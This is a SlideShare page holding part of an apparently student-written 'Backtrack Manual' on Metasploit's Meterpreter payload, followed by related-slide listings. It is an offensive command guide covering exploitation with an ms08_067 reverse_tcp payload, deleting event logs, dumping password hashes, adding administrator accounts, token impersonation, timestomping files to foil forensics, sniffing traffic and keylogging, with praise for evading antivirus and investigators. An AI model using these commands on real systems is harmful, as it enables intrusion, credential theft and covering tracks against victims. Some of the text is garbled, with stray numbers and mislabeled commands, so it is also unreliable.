SlideShare une entreprise Scribd logo
1  sur  19
Project Report<br />-459105253365on<br />-22459952540<br />Project  by - Nutan Kumar Panda<br />Technology Evangelist ISEH<br />R&D - ATL Guwahati<br />Meterpreter<br />When attempting to exploit a remote system, an attacker has a specific objective in mind—typically to obtain the command shell of the remote system, and thereby run arbitrary commands on that system. The attacker would also like to do this in as stealthy a manner as possible, as well as evade any Intrusion Detection Systems If the exploit is successful but the command shell fails to work or executing in a chroot environment, the attacker’s options would be severely limited. This would mean the launching of a new process on the remote system, which would result in a high-visibility situation where a good administrator or forensics analyst would first see the list of running processes on a suspect system. Also, the attacker usually has one shot at launching a command shell or running an arbitrary command.<br />This is where the Meterpreter (short for Meta-Interpreter) comes in. The Meterpreter is one of the advanced payloads available with the MSF.The way to look at the Meterpreter is not simply as a payload, but rather as an exploit platform that is executed on the remote system. The Meterpreter has its own command shell, which provides the attacker with a wide variety of activities that can be executed on the exploited system. Additionally, the Meterpreter allows developers to write their own extensions in the form of DLL files that can be uploaded and executed on the remote system. Thus, any programming language in which programs can be compiled into DLLs can be used to develop Meterpreter extensions.<br />But the real beauty of the Meterpreter is that it runs by injecting itself into the vulnerable running process on the remote system once exploitation occurs. All commands run through Meterpreter also execute within the context of the running process. In this manner, it is able to avoid detection by anti-virus systems or basic forensics examinations. A forensics expert would need to carry out a live response by dumping and analyzing the memory of running processes, in order to be able to determine the injected process. And even this would be far from straightforward. Meterpreter also comes with a set of default commands and extensions, which illustrate its flexibility and ease of use.<br />Msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp<br />Show Meterpreter Help or ? commands<br />These are Standard API Commands<br />These are Standard API Networking Commands<br />These are Standard API System Commands<br />These are Standard API User Interface Commands<br />These are Some Priv Extension Commands<br />These are Espia Extension Commands<br />These are Incognito Extension Commands<br />These are Sniffer Commands<br />ps<br />ps Command shows the process running on the system<br />espia,incognito & priv<br />Load the extra extension which are by default not enabled<br />Meterpreter > use espia<br />Meterpreter > use incognito<br />getuid<br />getuid shows the user ID<br />getpid<br />getpid shows the PID(process indentifier value) by which meterpreter is running<br />upload<br />upload is used for upload files from local host to remote host<br />USAGE:<br />upload <local_dir>/<filename> <remote_dir><br />download<br />download is used for downloading files from local host to remote host.<br />USAGE:<br />download –r < remote_dir>/<filename> < local_dir><br />Clearev<br />Clearev is used for deleting Application,System & Security logs.<br />execute<br />execute is used for executing any command from remote host<br />execute –h<br />execute –H –f cmd.exe –i<br />getprivs<br />getprivs is used to see what priveleges you have<br />kill<br />kill is used for killing a process with its PID<br />USAGE: check the PID value of a process from ps command<br />Kill <PID><br />Shell<br />Shell is used for getting a remote shell<br />sysinfo<br />sysinfo is used for showing System Information<br />idletime<br />idletime is used for getting the time that user has no interaction with his system.<br />uictl<br />uictl is used enabling/disabling the remote mouse/keyboard<br />USAGE:<br />uictl [enable/disable] [keyboard/mouse]<br />hashdump<br />hashdump is used for dumping the hashes of the user accounts for later password cracking.<br />screenshot<br />screenshot is used for taking a screenshot of the remote system<br />add_user<br />add_user command is used for creating auser with administrator priviliges.<br />USAGE:<br />add_user <username> <password><br />Token impersonation<br />This used when you hacked into a sytem and you don’t have full access on system then we impersonate a token of higher privilege user and then do whatever we want to.<br />USAGE:<br />First of all we check our priveleges<br />getuid<br />This command show the available tokens<br />list_tokens –u<br />Impersonate token<br />Impersonate _token <token_name><br />To check<br />getuid<br />Do your Stuff……………..<br />Back to your last UID<br />drop_token<br />Check again<br />Getuid<br />timestomp<br />timestomp is used for changing MAC(modified,acces,changed) time.<br />Interacting with most file systems is like walking in the snow...you will leave footprints. How detailed those footprints are, how much can be learned from them, and how long they last all depends on various circumstances. The art of analyzing these artifacts is digital forensics. For various reasons, when conducting a pen test you may want to make it hard for a forensic analyst to determine the actions that you took.<br />The best way to avoid detection by a forensic investigation is simple: Don't touch the filesystem! This is one of the beautiful things about meterpreter, it loads into memory without writing anything to disk, greatly minimizing the artifacts it leaves on a system. However, in many cases you may have to interact with the file system in some way. In those cases timestomp can be a great tool.<br />Lets look at a file on the system, and the MAC (Modified, Accessed, Changed) times of the file:<br />USAGE:<br />For help<br />timestomp –h<br />First see MAC time of file secret.txt<br />Now use timestomp command here we are changing all the three i.e MAC.<br />USAGE:<br />timestomp c:secret.txt –z “11/11/2011 11:11:11”<br />340042577724019050729615                          Before                                                                                   After<br />Sniffer<br />A sniffer is a piece of software that grabs all of the traffic flowing into and out of a computer attached to a network.<br />Meterpreter now has the capability of packet sniffing the remote host without ever touching the hard disk. This is especially useful if we want to monitor what type of information is being sent, and even better, this is probably the start of multiple auxiliary modules that will ultimately look for sensitive data within the capture files. The sniffer module can store up to 200,000 packets in a ring buffer and exports them in standard PCAP format so you can process them using psnuffle, dsniff, wireshark, etc.<br />USAGE:<br />Interfaces available<br />sniffer_interfaces<br />Start the sniffer<br />sniffer_start <interface_ID><br />Check the sniffer statistics<br />sniffer_stats <interface_ID><br />Dump the captures<br />sniffer_dump <interface_ID> <filename><br />Stop the sniffer<br />sniffer_stop <interface_ID><br />We can now use our favorite parser or packet analysis tool to review the information intercepted.<br />The Meterpreter packet sniffer uses the MicroOLAP Packet Sniffer SDK and can sniff the packets from the victim machine without ever having to install any drivers or write to the file system. The module is smart enough to realize its own traffic as well and will automatically remove any traffic from the Meterpreter interaction. In addition, Meterpreter pipes all information through an SSL/TLS tunnel and is fully encrypted.<br />Keylogging<br />Meterpreter keylogging script can use for low and slow information gathering is the keystroke logger script with Meterpreter. This tool is very well designed, allowing you to capture all keyboard input from the system, without writing anything to disk, leaving a minimal forensic footprint for investigators to later follow up on. Perfect for getting passwords, user accounts, and all sorts of other valuable information.<br />USAGE:<br />Start the keylogger<br />Keyscan_start<br />Dump the keylogger<br />Keyscan_dump<br />Stop the keylogger<br />Keyscan_stop<br />Ipconfig<br />ipconfig is a console application that displays all current TCP/IP network configuration values and refreshes Dynamic Host Configuration Protocol DHCP and Domain Name System DNS settings.<br />USAGE:<br />Ipconfig<br />Route<br />Route is a command used to view and manipulate the TCP/IP routing table. Manual manipulation of the routing table is characteristic of static routing.<br />USAGE: Display or modify the routing table on the remote machine.<br />For help<br />route –h<br />Add table<br />add [subnet] [netmask] [gateway]<br />Delete table<br />delete [subnet] [netmask] [gateway]<br />To see remote machine routing table<br />Route<br />portfwd<br />Port forwarding is the technique of forwarding aTCP/IP packet traversing a network Address translator (NAT) gateway to a predetermined network port on a host within a NAT-masqueraded, typically private network based on the port number on which it was received at the gateway from the originating host.<br />Portfwd –h<br />cat<br />cat is used for read the contents of the file to the screen.<br />cat <filename><br />background<br />edit is used for background an active session.<br />USAGE:<br />Background<br />reg<br />reg command is used for interacting with the remote machine registry<br />reg –h<br />USAGE:<br />Enumerate registry<br />Reg enumkey –k <key_path><br />Set value<br />Reg setval <key_path><br />
Backtrack Manual Part8
Backtrack Manual Part8
Backtrack Manual Part8
Backtrack Manual Part8
Backtrack Manual Part8
Backtrack Manual Part8
Backtrack Manual Part8
Backtrack Manual Part8
Backtrack Manual Part8
Backtrack Manual Part8
Backtrack Manual Part8
Backtrack Manual Part8
Backtrack Manual Part8
Backtrack Manual Part8
Backtrack Manual Part8
Backtrack Manual Part8
Backtrack Manual Part8
Backtrack Manual Part8

Contenu connexe

Tendances

Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort
webhostingguy
 
HKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with CoresightHKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with Coresight
Linaro
 
[CB16] COFI break – Breaking exploits with Processor trace and Practical cont...
[CB16] COFI break – Breaking exploits with Processor trace and Practical cont...[CB16] COFI break – Breaking exploits with Processor trace and Practical cont...
[CB16] COFI break – Breaking exploits with Processor trace and Practical cont...
CODE BLUE
 
Exploiting Modern Microarchitectures: Meltdown, Spectre, and other Attacks
Exploiting Modern Microarchitectures: Meltdown, Spectre, and other AttacksExploiting Modern Microarchitectures: Meltdown, Spectre, and other Attacks
Exploiting Modern Microarchitectures: Meltdown, Spectre, and other Attacks
inside-BigData.com
 
Dc 12 Chiueh
Dc 12 ChiuehDc 12 Chiueh
Dc 12 Chiueh
wollard
 

Tendances (20)

Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort
 
HKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with CoresightHKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with Coresight
 
Defense
DefenseDefense
Defense
 
How hackers attack networks
How hackers attack networksHow hackers attack networks
How hackers attack networks
 
Security Onion Conference - 2015
Security Onion Conference - 2015Security Onion Conference - 2015
Security Onion Conference - 2015
 
[CB16] COFI break – Breaking exploits with Processor trace and Practical cont...
[CB16] COFI break – Breaking exploits with Processor trace and Practical cont...[CB16] COFI break – Breaking exploits with Processor trace and Practical cont...
[CB16] COFI break – Breaking exploits with Processor trace and Practical cont...
 
Exploiting Modern Microarchitectures: Meltdown, Spectre, and other Attacks
Exploiting Modern Microarchitectures: Meltdown, Spectre, and other AttacksExploiting Modern Microarchitectures: Meltdown, Spectre, and other Attacks
Exploiting Modern Microarchitectures: Meltdown, Spectre, and other Attacks
 
Hacking the swisscom modem
Hacking the swisscom modemHacking the swisscom modem
Hacking the swisscom modem
 
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisHacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysis
 
snortinstallguide
snortinstallguidesnortinstallguide
snortinstallguide
 
BSides Denver: Stealthy, hypervisor-based malware analysis
BSides Denver: Stealthy, hypervisor-based malware analysisBSides Denver: Stealthy, hypervisor-based malware analysis
BSides Denver: Stealthy, hypervisor-based malware analysis
 
A Stuxnet for Mainframes
A Stuxnet for MainframesA Stuxnet for Mainframes
A Stuxnet for Mainframes
 
Report PAPID 7
Report PAPID 7Report PAPID 7
Report PAPID 7
 
Let's write a Debugger!
Let's write a Debugger!Let's write a Debugger!
Let's write a Debugger!
 
Report on forensics tools
Report on forensics toolsReport on forensics tools
Report on forensics tools
 
Dc 12 Chiueh
Dc 12 ChiuehDc 12 Chiueh
Dc 12 Chiueh
 
Stuxnet dc9723
Stuxnet dc9723Stuxnet dc9723
Stuxnet dc9723
 
Отчет Csa report RAPID7
Отчет  Csa report RAPID7Отчет  Csa report RAPID7
Отчет Csa report RAPID7
 
Integrity Protection for Embedded Systems
Integrity Protection for Embedded SystemsIntegrity Protection for Embedded Systems
Integrity Protection for Embedded Systems
 
Linux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringLinux Performance Profiling and Monitoring
Linux Performance Profiling and Monitoring
 

Similaire à Backtrack Manual Part8

Linux security quick reference guide
Linux security quick reference guideLinux security quick reference guide
Linux security quick reference guide
Craig Cannon
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
Rod Soto
 
[White paper] detecting problems in industrial networks though continuous mon...
[White paper] detecting problems in industrial networks though continuous mon...[White paper] detecting problems in industrial networks though continuous mon...
[White paper] detecting problems in industrial networks though continuous mon...
TI Safe
 
Windows Command Line Tools
Windows Command Line ToolsWindows Command Line Tools
Windows Command Line Tools
love4upratik
 

Similaire à Backtrack Manual Part8 (20)

Linux security quick reference guide
Linux security quick reference guideLinux security quick reference guide
Linux security quick reference guide
 
PandoraFMS: Free Monitoring System
PandoraFMS: Free Monitoring SystemPandoraFMS: Free Monitoring System
PandoraFMS: Free Monitoring System
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
 
System monitoring
System monitoringSystem monitoring
System monitoring
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gpos
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
 
Backtrack Manual Part6
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6
 
Citrix command lines
Citrix command linesCitrix command lines
Citrix command lines
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
[White paper] detecting problems in industrial networks though continuous mon...
[White paper] detecting problems in industrial networks though continuous mon...[White paper] detecting problems in industrial networks though continuous mon...
[White paper] detecting problems in industrial networks though continuous mon...
 
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
ThoughtWorks Tech Talks NYC: DevOops, 10 Ops Things You Might Have Forgotten ...
 
Meeting 3 network administrator tools
Meeting 3    network administrator toolsMeeting 3    network administrator tools
Meeting 3 network administrator tools
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
Internship msc cs
Internship msc csInternship msc cs
Internship msc cs
 
Windows Command Line Tools
Windows Command Line ToolsWindows Command Line Tools
Windows Command Line Tools
 
Linux Server Deep Dives (DrupalCon Amsterdam)
Linux Server Deep Dives (DrupalCon Amsterdam)Linux Server Deep Dives (DrupalCon Amsterdam)
Linux Server Deep Dives (DrupalCon Amsterdam)
 
Module 7 (sniffers)
Module 7 (sniffers)Module 7 (sniffers)
Module 7 (sniffers)
 
Linux System Monitoring
Linux System Monitoring Linux System Monitoring
Linux System Monitoring
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 

Plus de Nutan Kumar Panda

Plus de Nutan Kumar Panda (14)

Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST API
 
Dark Arts Of Social Engineering
Dark Arts Of Social EngineeringDark Arts Of Social Engineering
Dark Arts Of Social Engineering
 
OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!
 
Rapid Android Application Security Testing
Rapid Android Application Security TestingRapid Android Application Security Testing
Rapid Android Application Security Testing
 
Win 8 password cracking
Win 8 password crackingWin 8 password cracking
Win 8 password cracking
 
Backtrack Manual Part10
Backtrack Manual Part10Backtrack Manual Part10
Backtrack Manual Part10
 
Backtrack Manual Part9
Backtrack Manual Part9Backtrack Manual Part9
Backtrack Manual Part9
 
Backtrack Manual Part7
Backtrack Manual Part7Backtrack Manual Part7
Backtrack Manual Part7
 
Backtrack Manual Part5
Backtrack Manual Part5Backtrack Manual Part5
Backtrack Manual Part5
 
Backtrack Manual Part4
Backtrack Manual Part4Backtrack Manual Part4
Backtrack Manual Part4
 
Backtrack Manual Part3
Backtrack Manual Part3Backtrack Manual Part3
Backtrack Manual Part3
 
Backtrack Manual Part2
Backtrack Manual Part2Backtrack Manual Part2
Backtrack Manual Part2
 
Backtrack manual Part1
Backtrack manual Part1Backtrack manual Part1
Backtrack manual Part1
 
Google Hack
Google HackGoogle Hack
Google Hack
 

Dernier

Making and Justifying Mathematical Decisions.pdf
Making and Justifying Mathematical Decisions.pdfMaking and Justifying Mathematical Decisions.pdf
Making and Justifying Mathematical Decisions.pdf
Chris Hunter
 
Gardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch LetterGardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch Letter
MateoGardella
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
kauryashika82
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
PECB
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 -  Danh muc Sach Giao Khoa 10 . pdf1029 -  Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
QucHHunhnh
 
An Overview of Mutual Funds Bcom Project.pdf
An Overview of Mutual Funds Bcom Project.pdfAn Overview of Mutual Funds Bcom Project.pdf
An Overview of Mutual Funds Bcom Project.pdf
SanaAli374401
 
Seal of Good Local Governance (SGLG) 2024Final.pptx
Seal of Good Local Governance (SGLG) 2024Final.pptxSeal of Good Local Governance (SGLG) 2024Final.pptx
Seal of Good Local Governance (SGLG) 2024Final.pptx
negromaestrong
 
Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.
MateoGardella
 

Dernier (20)

Making and Justifying Mathematical Decisions.pdf
Making and Justifying Mathematical Decisions.pdfMaking and Justifying Mathematical Decisions.pdf
Making and Justifying Mathematical Decisions.pdf
 
Measures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDMeasures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SD
 
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptxINDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
 
Accessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactAccessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impact
 
Application orientated numerical on hev.ppt
Application orientated numerical on hev.pptApplication orientated numerical on hev.ppt
Application orientated numerical on hev.ppt
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptx
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdf
 
Gardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch LetterGardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch Letter
 
How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17
 
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdf
 
PROCESS RECORDING FORMAT.docx
PROCESS      RECORDING        FORMAT.docxPROCESS      RECORDING        FORMAT.docx
PROCESS RECORDING FORMAT.docx
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 -  Danh muc Sach Giao Khoa 10 . pdf1029 -  Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
 
Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..
 
An Overview of Mutual Funds Bcom Project.pdf
An Overview of Mutual Funds Bcom Project.pdfAn Overview of Mutual Funds Bcom Project.pdf
An Overview of Mutual Funds Bcom Project.pdf
 
Seal of Good Local Governance (SGLG) 2024Final.pptx
Seal of Good Local Governance (SGLG) 2024Final.pptxSeal of Good Local Governance (SGLG) 2024Final.pptx
Seal of Good Local Governance (SGLG) 2024Final.pptx
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across Sectors
 
Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.
 

Backtrack Manual Part8

  • 1. Project Report<br />-459105253365on<br />-22459952540<br />Project by - Nutan Kumar Panda<br />Technology Evangelist ISEH<br />R&D - ATL Guwahati<br />Meterpreter<br />When attempting to exploit a remote system, an attacker has a specific objective in mind—typically to obtain the command shell of the remote system, and thereby run arbitrary commands on that system. The attacker would also like to do this in as stealthy a manner as possible, as well as evade any Intrusion Detection Systems If the exploit is successful but the command shell fails to work or executing in a chroot environment, the attacker’s options would be severely limited. This would mean the launching of a new process on the remote system, which would result in a high-visibility situation where a good administrator or forensics analyst would first see the list of running processes on a suspect system. Also, the attacker usually has one shot at launching a command shell or running an arbitrary command.<br />This is where the Meterpreter (short for Meta-Interpreter) comes in. The Meterpreter is one of the advanced payloads available with the MSF.The way to look at the Meterpreter is not simply as a payload, but rather as an exploit platform that is executed on the remote system. The Meterpreter has its own command shell, which provides the attacker with a wide variety of activities that can be executed on the exploited system. Additionally, the Meterpreter allows developers to write their own extensions in the form of DLL files that can be uploaded and executed on the remote system. Thus, any programming language in which programs can be compiled into DLLs can be used to develop Meterpreter extensions.<br />But the real beauty of the Meterpreter is that it runs by injecting itself into the vulnerable running process on the remote system once exploitation occurs. All commands run through Meterpreter also execute within the context of the running process. In this manner, it is able to avoid detection by anti-virus systems or basic forensics examinations. A forensics expert would need to carry out a live response by dumping and analyzing the memory of running processes, in order to be able to determine the injected process. And even this would be far from straightforward. Meterpreter also comes with a set of default commands and extensions, which illustrate its flexibility and ease of use.<br />Msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp<br />Show Meterpreter Help or ? commands<br />These are Standard API Commands<br />These are Standard API Networking Commands<br />These are Standard API System Commands<br />These are Standard API User Interface Commands<br />These are Some Priv Extension Commands<br />These are Espia Extension Commands<br />These are Incognito Extension Commands<br />These are Sniffer Commands<br />ps<br />ps Command shows the process running on the system<br />espia,incognito & priv<br />Load the extra extension which are by default not enabled<br />Meterpreter > use espia<br />Meterpreter > use incognito<br />getuid<br />getuid shows the user ID<br />getpid<br />getpid shows the PID(process indentifier value) by which meterpreter is running<br />upload<br />upload is used for upload files from local host to remote host<br />USAGE:<br />upload <local_dir>/<filename> <remote_dir><br />download<br />download is used for downloading files from local host to remote host.<br />USAGE:<br />download –r < remote_dir>/<filename> < local_dir><br />Clearev<br />Clearev is used for deleting Application,System & Security logs.<br />execute<br />execute is used for executing any command from remote host<br />execute –h<br />execute –H –f cmd.exe –i<br />getprivs<br />getprivs is used to see what priveleges you have<br />kill<br />kill is used for killing a process with its PID<br />USAGE: check the PID value of a process from ps command<br />Kill <PID><br />Shell<br />Shell is used for getting a remote shell<br />sysinfo<br />sysinfo is used for showing System Information<br />idletime<br />idletime is used for getting the time that user has no interaction with his system.<br />uictl<br />uictl is used enabling/disabling the remote mouse/keyboard<br />USAGE:<br />uictl [enable/disable] [keyboard/mouse]<br />hashdump<br />hashdump is used for dumping the hashes of the user accounts for later password cracking.<br />screenshot<br />screenshot is used for taking a screenshot of the remote system<br />add_user<br />add_user command is used for creating auser with administrator priviliges.<br />USAGE:<br />add_user <username> <password><br />Token impersonation<br />This used when you hacked into a sytem and you don’t have full access on system then we impersonate a token of higher privilege user and then do whatever we want to.<br />USAGE:<br />First of all we check our priveleges<br />getuid<br />This command show the available tokens<br />list_tokens –u<br />Impersonate token<br />Impersonate _token <token_name><br />To check<br />getuid<br />Do your Stuff……………..<br />Back to your last UID<br />drop_token<br />Check again<br />Getuid<br />timestomp<br />timestomp is used for changing MAC(modified,acces,changed) time.<br />Interacting with most file systems is like walking in the snow...you will leave footprints. How detailed those footprints are, how much can be learned from them, and how long they last all depends on various circumstances. The art of analyzing these artifacts is digital forensics. For various reasons, when conducting a pen test you may want to make it hard for a forensic analyst to determine the actions that you took.<br />The best way to avoid detection by a forensic investigation is simple: Don't touch the filesystem! This is one of the beautiful things about meterpreter, it loads into memory without writing anything to disk, greatly minimizing the artifacts it leaves on a system. However, in many cases you may have to interact with the file system in some way. In those cases timestomp can be a great tool.<br />Lets look at a file on the system, and the MAC (Modified, Accessed, Changed) times of the file:<br />USAGE:<br />For help<br />timestomp –h<br />First see MAC time of file secret.txt<br />Now use timestomp command here we are changing all the three i.e MAC.<br />USAGE:<br />timestomp c:secret.txt –z “11/11/2011 11:11:11”<br />340042577724019050729615 Before After<br />Sniffer<br />A sniffer is a piece of software that grabs all of the traffic flowing into and out of a computer attached to a network.<br />Meterpreter now has the capability of packet sniffing the remote host without ever touching the hard disk. This is especially useful if we want to monitor what type of information is being sent, and even better, this is probably the start of multiple auxiliary modules that will ultimately look for sensitive data within the capture files. The sniffer module can store up to 200,000 packets in a ring buffer and exports them in standard PCAP format so you can process them using psnuffle, dsniff, wireshark, etc.<br />USAGE:<br />Interfaces available<br />sniffer_interfaces<br />Start the sniffer<br />sniffer_start <interface_ID><br />Check the sniffer statistics<br />sniffer_stats <interface_ID><br />Dump the captures<br />sniffer_dump <interface_ID> <filename><br />Stop the sniffer<br />sniffer_stop <interface_ID><br />We can now use our favorite parser or packet analysis tool to review the information intercepted.<br />The Meterpreter packet sniffer uses the MicroOLAP Packet Sniffer SDK and can sniff the packets from the victim machine without ever having to install any drivers or write to the file system. The module is smart enough to realize its own traffic as well and will automatically remove any traffic from the Meterpreter interaction. In addition, Meterpreter pipes all information through an SSL/TLS tunnel and is fully encrypted.<br />Keylogging<br />Meterpreter keylogging script can use for low and slow information gathering is the keystroke logger script with Meterpreter. This tool is very well designed, allowing you to capture all keyboard input from the system, without writing anything to disk, leaving a minimal forensic footprint for investigators to later follow up on. Perfect for getting passwords, user accounts, and all sorts of other valuable information.<br />USAGE:<br />Start the keylogger<br />Keyscan_start<br />Dump the keylogger<br />Keyscan_dump<br />Stop the keylogger<br />Keyscan_stop<br />Ipconfig<br />ipconfig is a console application that displays all current TCP/IP network configuration values and refreshes Dynamic Host Configuration Protocol DHCP and Domain Name System DNS settings.<br />USAGE:<br />Ipconfig<br />Route<br />Route is a command used to view and manipulate the TCP/IP routing table. Manual manipulation of the routing table is characteristic of static routing.<br />USAGE: Display or modify the routing table on the remote machine.<br />For help<br />route –h<br />Add table<br />add [subnet] [netmask] [gateway]<br />Delete table<br />delete [subnet] [netmask] [gateway]<br />To see remote machine routing table<br />Route<br />portfwd<br />Port forwarding is the technique of forwarding aTCP/IP packet traversing a network Address translator (NAT) gateway to a predetermined network port on a host within a NAT-masqueraded, typically private network based on the port number on which it was received at the gateway from the originating host.<br />Portfwd –h<br />cat<br />cat is used for read the contents of the file to the screen.<br />cat <filename><br />background<br />edit is used for background an active session.<br />USAGE:<br />Background<br />reg<br />reg command is used for interacting with the remote machine registry<br />reg –h<br />USAGE:<br />Enumerate registry<br />Reg enumkey –k <key_path><br />Set value<br />Reg setval <key_path><br />